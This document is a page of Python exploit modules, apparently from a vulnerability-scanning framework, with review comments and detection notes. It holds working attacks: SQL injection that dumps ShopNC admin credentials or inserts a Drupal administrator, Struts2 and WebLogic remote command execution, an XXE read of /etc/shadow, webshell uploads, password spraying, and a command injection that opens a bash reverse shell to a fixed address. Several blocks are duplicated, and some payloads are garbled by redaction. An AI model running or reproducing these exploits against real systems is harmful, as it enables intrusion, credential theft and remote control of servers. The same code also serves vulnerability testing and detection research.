Esempio n. 1
    def _attack(self):
        """Attack mode for the ShopNC member-address SQL injection.

        Saves an address whose ``true_name[]`` array carries SQL, then fetches
        the address page where the ``concat(0x7e, ...)`` subqueries render the
        first ``shopnc_admin`` row.  Returns ``self.parse_attack(result)``.

        Detection note: a POST to ``act=member_address&op=address&inajax=1``
        with SQL keywords / ``0x7e`` inside ``true_name[]`` is the signature.
        """
        result = {}
        url = urlparse.urljoin(
            self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(
            self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        # Each leaked value is prefixed with "~" (0x7e) so it can be located in the
        # rendered page below.
        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append(
            "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
        )
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # The save response is never inspected; only the follow-up GET matters.
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200:
            # Every "~word" run in the page is taken as a leaked value.  A second
            # match is assumed unconditionally, so a page with a single "~" raises
            # IndexError here.
            match_result = re.findall(r'~\w*', res.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)
Esempio n. 2
    def _verify(self):
        """Verify mode: log in interactively, then POST a profile update that
        carries an ``IsAdmin`` field to ``me/setBasic`` and look for the admin
        link in the response.

        NOTE(review): the text between ``getpass.getpass('password:'`` and the
        ``find_result`` check has been replaced by ``******`` (a secret-redaction
        artefact), so the login request that should define ``admin_result`` and
        ``find_result`` is missing and the block does not parse as shown.
        """
        result = {}
        #   Endpoint URLs
        vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
        logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
        login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
        admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
        #   Privilege-escalation payload (mass-assignment of UserInfo[IsAdmin])
        payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="

        headers = {"Content-Type": "application/x-www-form-urlencoded"}

        email = raw_input("Email: ")
        password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
            if find_result != -1:
                #   Reuse the session cookies from the login/escalation response
                cookies = admin_result.cookies
                #   Request the admin settings page with those cookies
                get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)

                print cookies
                print get_shell_result.content
                print get_shell_result.cookies

                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Postdata'] = payload
        return self.parse_attack(result)
Esempio n. 3
    def _verify(self):
        """Verify mode for Struts2 OGNL injection via the ``Content-Type`` header.

        Sends an OGNL expression that runs ``echo <marker>`` through
        ``ProcessBuilder`` and copies the output into the HTTP response; the
        marker string in ``response.content`` confirms execution.

        Detection note: a ``Content-Type`` header starting with ``%{`` and
        containing ``#_memberAccess`` / ``ProcessBuilder`` is the signature.

        NOTE(review): the ``#[email protected]@DEFAULT_MEMBER_ACCESS`` token looks like
        an e-mail obfuscator rewrote part of the original OGNL; the payload as
        printed is probably not what the author wrote -- confirm.
        """
        result = {}
        command = "echo 89aifh76ftq4fu38yfq498yf"
        payload = "Content-Type:%{(#_='multipart/form-data')."
        payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % command
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}

        response = req.post(self.url, headers=headers)
        # The marker is the literal echoed by `command`; no status-code check.
        if "89aifh76ftq4fu38yfq498yf" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        return self.parse_output(result)
Esempio n. 4
    def _verify(self):
        """Verify mode for an XML external entity (XXE) read on ``/api/login``.

        Posts a DOCTYPE that declares a ``file://`` entity and checks whether the
        response starts with a ``root:`` passwd-style line.

        NOTE(review): ``result['Fileinfo']`` is never initialised, so the
        assignment below raises KeyError on a positive hit; the bare ``except``
        then resets ``result`` to ``{}``.  Also two ``<?xml`` declarations are
        emitted back-to-back, which strict parsers reject.
        """
        result = {}
        # Uses a read of /etc/shadow as the test case
        filename = '/etc/shadow'
        payload=r'<?xml version="1.0" encoding="ISO-8859-1"?>'\
                 '<?xml version="1.0" encoding="ISO-8859-1"?>'\
                 '<!DOCTYPE foo ['\
                 '<!ELEMENT foo ANY >'\
                 '<!ENTITY xxe SYSTEM "file://{file}" >]>' \
                 '<Request>'\
                 '<Username>root</Username>'\
                 '<Password>root</Password>'\
                 '</Request>'.format(file=filename)

        expurl = '{url}/api/login'.format(url=self.url)
        try:
            response = req.post(expurl,
                                data=payload,
                                headers=self.headers,
                                timeout=50)
            # re.match anchors at the start of the body.
            if re.match('root:.+?:0:0:.+?:.+?:.+?',
                        response.content) and response.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = expurl
                result['Fileinfo']['Filename'] = filename
                result['Fileinfo']['Content'] = response.content
            else:
                result = {}
        except:
            # Bare except: swallows network errors and the KeyError noted above.
            result = {}
        return self.parse_output(result)
Esempio n. 5
    def _attack(self):
        """Attack mode: SQL injection through the ``name[]`` array of a login form.

        The ``form_id=user_login_block`` / ``users_roles`` names suggest a Drupal
        target -- not stated on the page, confirm.  Inserts a user with a fixed
        password hash and a random uid/username, then reports those as
        ``AdminInfo``.  Bails out first if ``self._verify(verify=False)`` fails.

        NOTE(review): the reported ``Password`` is the literal ``'******'``,
        which looks like a redaction artefact rather than the real cleartext.
        """
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        uid = int(random.random() * 1000)
        username = ''.join(random.sample(string.letters + string.digits, 5))
        # OrderedDict so the injected key is sent before the benign 'name[0]'.
        payload = OrderedDict()

        if not self._verify(verify=False):
            return self.parse_attack(result)

        # Key of the form-field carries the stacked INSERT statements; the value is irrelevant.
        payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
                '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
                'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
            = 'test'
        payload['name[0]'] = 'test2'
        payload['pass'] = '******'
        payload['form_id'] = 'user_login_block'

        # print urllib.urlencode(payload)
        response = req.post(vul_url, data=payload)
        # Only the status code is checked; success of the INSERT is not confirmed.
        if response.status_code == 200:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = username
            result['AdminInfo']['Password'] = '******'

        return self.parse_attack(result)
Esempio n. 6
    def _attack(self):
        """Attack mode: unrestricted upload followed by local file inclusion.

        Uploads a ``.jpg`` whose body is PHP via ``index.php?ac=common_upfile``,
        reads the stored filename out of the response, then includes it through
        ``index.php?d=../../uploadfiles/<name>%00``.  A hit is the md5(123)
        constant appearing in the included output.  Falls back to ``_verify()``
        when ``check_argv()`` is false.

        NOTE(review): ``self.headers['Content-Type']`` is set with the multipart
        boundary but ``req.post`` below is not passed ``headers=``; whether
        ``req`` applies ``self.headers`` globally is not visible here -- confirm.
        """
        if self.check_argv():
            result = {}

            self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
            post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
            # Upload the file
            post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
            resp = req.post(url=post_url,data=post_data)

            # Extract the stored filename from the upload response
            if resp.status_code == 200:
                match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
                if match_result:
                    # Request the local-file-inclusion URL (null byte truncates the suffix)
                    payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                    vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
                    resp = req.get(vul_url)
                    # '202cb9...' is the md5(123) the uploaded file prints.
                    if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
                        result['ShellInfo'] = {}
                        result['ShellInfo']['URL'] = vul_url
                        result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
            return self.parse_attack(result)

        return self._verify()
Esempio n. 7
    def _attack(self):
        """Attack mode: SQL injection through the ``name[]`` array of a login form.

        Duplicate of the earlier ``_attack`` on this page (same payload, only the
        continuation indentation differs).  The ``form_id=user_login_block`` /
        ``users_roles`` names suggest a Drupal target -- not stated, confirm.
        Inserts a user with a fixed hash and random uid/username and reports them
        as ``AdminInfo``; ``Password`` is the literal ``'******'`` (looks redacted).
        """
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        uid = int(random.random() * 1000)
        username = ''.join(random.sample(string.letters + string.digits, 5))
        # OrderedDict so the injected key is sent before the benign 'name[0]'.
        payload = OrderedDict()

        if not self._verify(verify=False):
            return self.parse_attack(result)

        # The form-field *key* carries the stacked INSERTs; the value is irrelevant.
        payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
                '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
                'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
                 = 'test'
        payload['name[0]'] = 'test2'
        payload['pass'] = '******'
        payload['form_id'] = 'user_login_block'

        #print urllib.urlencode(payload)
        response = req.post(vul_url, data=payload)
        # Only the status code is checked; the INSERT itself is not confirmed.
        if response.status_code == 200:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = username
            result['AdminInfo']['Password'] = '******'

        return self.parse_attack(result)
Esempio n. 8
 def common(self):
     """Obtain a session id from ``/escform.esp`` by posting the ALARM login form.

     Returns the numeric ``sessionid`` captured from the ``<FRAME src=...>``
     redirect, or ``None`` when the pattern is absent (the match object is
     reused as the return variable).
     """
     payload = 'formid=1&login=ALARM'
     response = req.post(self.url + "/escform.esp" , data = payload).content
     sessionid = re.search('<FRAME src="escmenu\.esp\?sessionid=(\d*)' , response)
     if sessionid:
         sessionid = sessionid.group(1)
     return sessionid
    def _verify(self):
        """Verify mode: password spraying against ``/login.php`` with a fresh
        CSRF token and cookie jar per attempt.

        Iterates ``getLargeWeakPassword()`` for the (redacted) ``username``.
        Returns ``parse_output`` on the first non-"Login failed" message; if the
        CSRF token is rejected the error is reported under ``extra``.

        NOTE(review): when every candidate fails the loop exhausts and the
        method returns ``None`` implicitly, not ``parse_output(result)``.
        Assumes the fourth ``<input>`` on the page is the token -- fragile.
        """
        result = {}
        username = '******'  # login account (redacted)
        pwdlist = getLargeWeakPassword()

        for pwd in pwdlist:
            htmlTXT = req.get(self.url + "/login.php")
            Content = pq(htmlTXT.text)
            tokenStr = Content("input")
            Token = tokenStr[3].value  # CSRF token (positional: 4th input)
            _cookies = htmlTXT.cookies.get_dict()  # session cookies

            payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'}
            response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
            rcontent = pq(response.text)
            reqMes = rcontent('.message').text()

            if reqMes == "Login failed":
                continue  # wrong password: next candidate
            if reqMes == "CSRF token is incorrect":
                result['extra'] = {}
                result['extra']['error'] = 'user_token校验失败'
                return self.parse_output(result)  # CSRF token rejected

            # Any other message is treated as a successful login
            result['DBInfo'] = {}
            result['DBInfo']['Username'] = username
            result['DBInfo']['Password'] = pwd
            return self.parse_output(result)
 def _verify(self):
     """Verify mode for the WebLogic ``/_async/AsyncResponseService`` endpoint.

     Posts ``self.payload_linux`` and ``self.payload_win`` (defined elsewhere)
     with a base64-wrapped shell command and treats HTTP 202 from either as a
     positive.  Note that 202 only means the message was accepted, not that the
     command ran.  Side effect: ``self.url`` is rewritten to the endpoint URL.
     """
     result = {}
     filename = "/_async/AsyncResponseService"
     self.url = self.url.strip('/') + filename
     headers = {'content-type': 'text/xml'}
     # flag = ''.join(random.choices(string.ascii_letters) for _ in xrange(0, 8))
     # flag = flag.lower()
     cmd = 'echo d2hvYW1p|base64 -d|bash'
     data_linux = self.payload_linux.format(cmd)
     data_win = self.payload_win.format(cmd)
     r1 = req.post(self.url, data=data_linux, headers=headers, timeout=7)
     r2 = req.post(self.url, data=data_win, headers=headers, timeout=7)
     if r1.status_code == 202 or r2.status_code == 202:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['url'] = self.url
     return self.parse_output(result)
    def _verify( self ):
        """Verify mode for OS command injection in ``/vulnerabilities/exec/``.

        Logs in with fixed (redacted) credentials, forces ``security=low``, sends
        ``127.0.0.1;echo <md5>`` and checks that the marker is echoed back.  The
        ``/login.php`` + ``security`` cookie layout looks like DVWA -- confirm.

        NOTE(review): on a hit it then fires a reverse shell to a hard-coded
        address (192.168.1.55:8888), which is not parameterised, and when the
        marker does not match the method returns ``None`` rather than
        ``parse_output(result)``.
        """
        result = {}
        username = '******'  # login account (redacted)
        password = '******'  # login password (redacted)

        htmlTXT = req.get(self.url + "/login.php")
        Content = pq(htmlTXT.text)
        tokenStr = Content("input")
        Token = tokenStr[3].value  # CSRF token (positional: 4th input)
        _cookies = htmlTXT.cookies.get_dict()  # session cookies
        # Force the security level cookie to 'low'
        _cookies['security'] = 'low'
        payload = {'username': username, 'password': password, 'user_token': Token, 'Login': '******'}
        response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)

        # Random number, md5-hashed, used as the execution marker
        rand_num = random.randint(0, 1000)
        md5 = hashlib.md5()
        md5.update(str(rand_num))
        m = md5.hexdigest()
        # Probe for command injection
        payload = {'ip': '127.0.0.1;echo "<p>' + str(m) + '</p><br/>"', 'Submit': 'Submit'}
        response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
        htmlText = pq(response.text)
        tag = htmlText('pre p').html()

        if tag == str(m):
            # Reverse shell; a listener must already be running

            # Method 1: bash
            payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
            response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            # Method 2: bash via a script file
            # payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
            # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            # Method 3: Python; apparently only works when run manually
            # payload = {
            #     'ip'    : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
            #     'Submit': 'Submit'}
            # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            result['extra'] = {}
            result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
            return self.parse_output(result)
Esempio n. 12
 def _verify(self):
     """Verify mode: POST to ``self.url`` with no body and report a hit when the
     response mentions ``information_schema``.

     NOTE(review): the ``time.sleep(2)`` runs after the response has already
     been received, so it does not influence the check.
     """
     result = {}
     resp = req.post(self.url)
     time.sleep(2)
     if 'information_schema' in resp.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
     return self.parse_output(result)
Esempio n. 13
 def _verify(self):
     """Verify mode for Struts2 OGNL injection via the ``Content-type`` header.

     The expression writes the literal ``bey0nd`` into the response; its
     presence in ``resp.text`` is the positive signal.  The header is stored on
     ``self.headers`` and so persists for later requests on this instance.

     NOTE(review): the ``#[email protected]@...`` tokens look like an e-mail
     obfuscator rewrote parts of the OGNL; the printed payload is probably not
     the author's original -- confirm.
     """
     result = {}
     self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
     resp = req.post(self.url,headers = self.headers)
     if resp and resp.text and resp.status_code == 200:
         if "bey0nd" in resp.text:
             result['FileInfo'] = {}
             result['FileInfo']['Filename'] = "bey0nd"
     return self.parse_output(result)
Esempio n. 14
    def _verify(self):
        """Verify mode for the ShopNC member-address SQL injection.

        Saves an address whose ``true_name[]`` array injects ``md5(0x2333333)``
        and then reads the address page; the constant hash in the page is the
        positive signal.  Same request shape as the ``_attack`` variants on this
        page, with a harmless marker instead of admin-table subqueries.
        """
        result = {}
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # The save response is not inspected; only the follow-up GET matters.
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)
    def _attack(self):
        """Attack mode: write a PHP file through ``/admin/file_manager.php?action=save``.

        Uses the ``PhpShell`` / ``genPassword`` helpers (defined elsewhere) to
        build the file body and a random six-letter filename, then confirms
        the file is served via ``webshell.check``.  Returns ``ShellInfo`` with
        the URL and the written content on success.

        NOTE(review): the save response is discarded; only ``check`` decides.
        """
        result = {}

        vul_url = '/admin/file_manager.php'
        params = {'action': 'save'}

        webshell = PhpShell()
        webshell.set_pwd(genPassword(6))
        filename = ''.join(
            [random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
        content = webshell.get_content()
        data = {'filename': filename, 'file_contents': content, 'submit': ''}

        req.post(self.url + vul_url, params=params, data=data)
        if webshell.check(self.url + ('/%s' % filename)):
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + ('/%s' % filename)
            result['ShellInfo']['Content'] = content

        return self.parse_output(result)
Esempio n. 16
    def _attack(self):
        """Attack mode: send ``resource=;id`` to ``/res.php`` and hand the raw
        body to ``parse_attack``.

        NOTE(review): unlike the other blocks on this page, ``parse_attack`` is
        given a string (or ``False``) instead of a result dict -- check that the
        base class accepts that.  The ``Connection-Type`` header is not a
        standard HTTP header.
        """
        head = {
            'Connection-Type': 'application/x-www-form-urlencoded',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        payload = 'action=get&resource=%3Bid'

        response = req.post(self.url + '/res.php', data=payload, headers=head)
        if response.content:
            return self.parse_attack(response.content)
        else:
            return self.parse_attack(False)
Esempio n. 17
    def _verify(self):
        """Verify mode for an unrestricted upload in ``/maxImageUpload/index.php``.

        Uploads ``1.php`` (self-deleting, prints ``md5(0x2333333)``) as
        ``image/jpeg`` and then requests ``/maxImageUpload/original/1.php``.

        NOTE(review): the hash is tested with ``in resp`` against the Response
        object rather than ``resp.content``, so the check never sees the body
        as a string.  The ``.content`` of the upload call is evaluated and
        discarded.
        """
        result = {}
        testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
        vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')

        payload = {
            'myfile':
            ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>',
             'image/jpeg')
        }
        data = {'submitBtn': 'Upload'}

        req.post(vulurl, files=payload, data=data).content
        resp = req.get(testurl)
        if '5a8adb32edd60e0cfb459cfb38093755' in resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        #Write your code here

        return self.parse_output(result)
Esempio n. 18
    def _attack(self):
        """Attack mode for the ShopNC member-address SQL injection.

        Duplicate of the first ``_attack`` on this page (identical payload,
        single-line URL joins).  Saves an address whose ``true_name[]`` array
        carries ``concat(0x7e, ...)`` subqueries against ``shopnc_admin`` and
        picks the ``~``-prefixed values out of the rendered address page.
        """
        result = {}
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200:
            # A second "~" match is assumed; a single match raises IndexError.
            match_result = re.findall(r'~\w*', res.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)
 def _attack(self):
     """Attack mode for the WebLogic ``/_async/AsyncResponseService`` endpoint.

     Posts ``self.payload_linux`` / ``self.payload_win`` (defined elsewhere)
     with base64-wrapped commands; per the inline comment these issue a
     ``ping`` to an out-of-band DNS callback domain that is baked into the
     base64 constants.  On HTTP 202 the result is read back through
     ``self.verify_result()`` (defined elsewhere).

     NOTE(review): ``print(url)`` is leftover debug output; the callback domain
     is hard-coded rather than taken from configuration.
     """
     result = {}
     filename = "/_async/AsyncResponseService"
     url = self.url.strip('/') + filename
     print(url)
     headers = {'content-type': 'text/xml'}
     #--ping `whoami`.weblogic.xxxxxx.ceye.io--
     cmd_linux = 'echo cGluZyBgd2hvYW1pYC53ZWJsb2dpYy42ZmJwaWMuY2V5ZS5pbw==|base64 -d|bash'
     cmd_win = 'echo cGluZyBMTEwud2VibG9naWMuNmZicGljLmNleWUuaW8=|base64 -d|bash'
     data_liunx = self.payload_linux.format(cmd_linux)
     #print(data_liunx)
     data_win = self.payload_win.format(cmd_win)
     r1 = req.post(url, data=data_liunx, headers=headers, timeout=7)
     r2 = req.post(url, data=data_win, headers=headers, timeout=7)
     # 202 only means the async message was accepted, hence the OOB check next.
     if r1.status_code == 202 or r2.status_code == 202:
         whoami = self.verify_result()
         if whoami:
             result['extra'] = {}
             result['extra']['whoami'] = whoami
             result['VerifyInfo'] = {}
             result['VerifyInfo']['url'] = self.url
     return self.parse_output(result)
Esempio n. 20
    def _verify(self):
        """Verify mode for the ShopNC member-address SQL injection.

        Duplicate of the earlier ``_verify`` with wrapped URL joins.  Injects
        ``md5(0x2333333)`` through ``true_name[]`` and looks for the constant
        hash in the address page.
        """
        result = {}
        url = urlparse.urljoin(
            self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(
            self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append(
            "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
        )
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # The save response is not inspected; only the follow-up GET matters.
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)
    def _verify(self):
        """Verify mode: write a probe file through ``/admin/file_manager.php?action=save``.

        Uses the ``PhpVerify`` helper (defined elsewhere) for the file body and a
        random six-letter ``.php`` filename, then confirms via ``webshell.check``.
        Reports the URL of the save request on success.
        """
        result = {}
        vul_url = '/admin/file_manager.php'
        params = {'action': 'save'}

        webshell = PhpVerify()
        filename = ''.join(
            [random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
        content = webshell.get_content()
        data = {'filename': filename, 'file_contents': content, 'submit': ''}

        response = req.post(self.url + vul_url, params=params, data=data)
        if webshell.check(self.url + ('/%s' % filename)):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        
        return self.parse_output(result)
Esempio n. 22
 def _attack(self):
     '''
     Attack mode for vBulletin PHP object injection via
     ``/ajax/api/hook/decodeArguments``.

     Creates ``1.php`` in the web root:
     <?php eval($_POST["a"]);?>
     then confirms it by POSTing ``echo md5(0x2333);`` and looking for the
     constant hash.  ``payload`` is a URL-encoded serialized ``vB_dB_Result``
     whose ``free_result`` callback is ``assert``.
     '''
     result = {}
     payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A55%3A%22file_put_contents%28%271.php%27%2C%27%3C%3Fphp+eval%28%24_POST%5B%22a%22%5D%29%3B%3F%3E%27%29%22%3B%7D"
     vulurl = urlparse.urljoin(
         self.url, "/ajax/api/hook/decodeArguments?arguments=%s" % payload)
     resp = req.get(vulurl)
     if resp.status_code == 200:
         verify_payload = {"a": "echo md5(0x2333);"}
         shell_url = urlparse.urljoin(self.url, '/1.php')
         resp1 = req.post(shell_url, data=verify_payload)
         if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
             result['shellURL'] = shell_url + "  password: a"
             return self.parse_attack(result)
     return self.parse_attack(result)
Esempio n. 23
    def _verify(self):
        """Verify mode for error-based SQL injection in ``/celive/live/header.php``.

        Injects a ``count(*)/floor(rand(0)*2)`` duplicate-key expression through
        ``xajaxargs[0][name]``; the error message then contains ``md5(233)``.

        NOTE(review): this block calls ``self.parse_result`` whereas the rest of
        the page uses ``parse_output`` / ``parse_attack`` -- confirm it exists.
        """
        result = {}
        target = self.url + '/celive/live/header.php'
        post_data = {
            'xajax': 'LiveMessage',
            'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                                  "floor(rand(0)*2),(select md5(233)))a from "
                                  "information_schema.tables group by a)b),"
                                  "'','','','1','127.0.0.1','2') #"
        }
        # Send the POST with requests
        response = req.post(target, data=post_data, timeout=10)
        content = response.content
        # e165421110ba03099a1c0393373c5b43 is the value of md5(233)
        if 'e165421110ba03099a1c0393373c5b43' in content:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = target

        return self.parse_result(result)
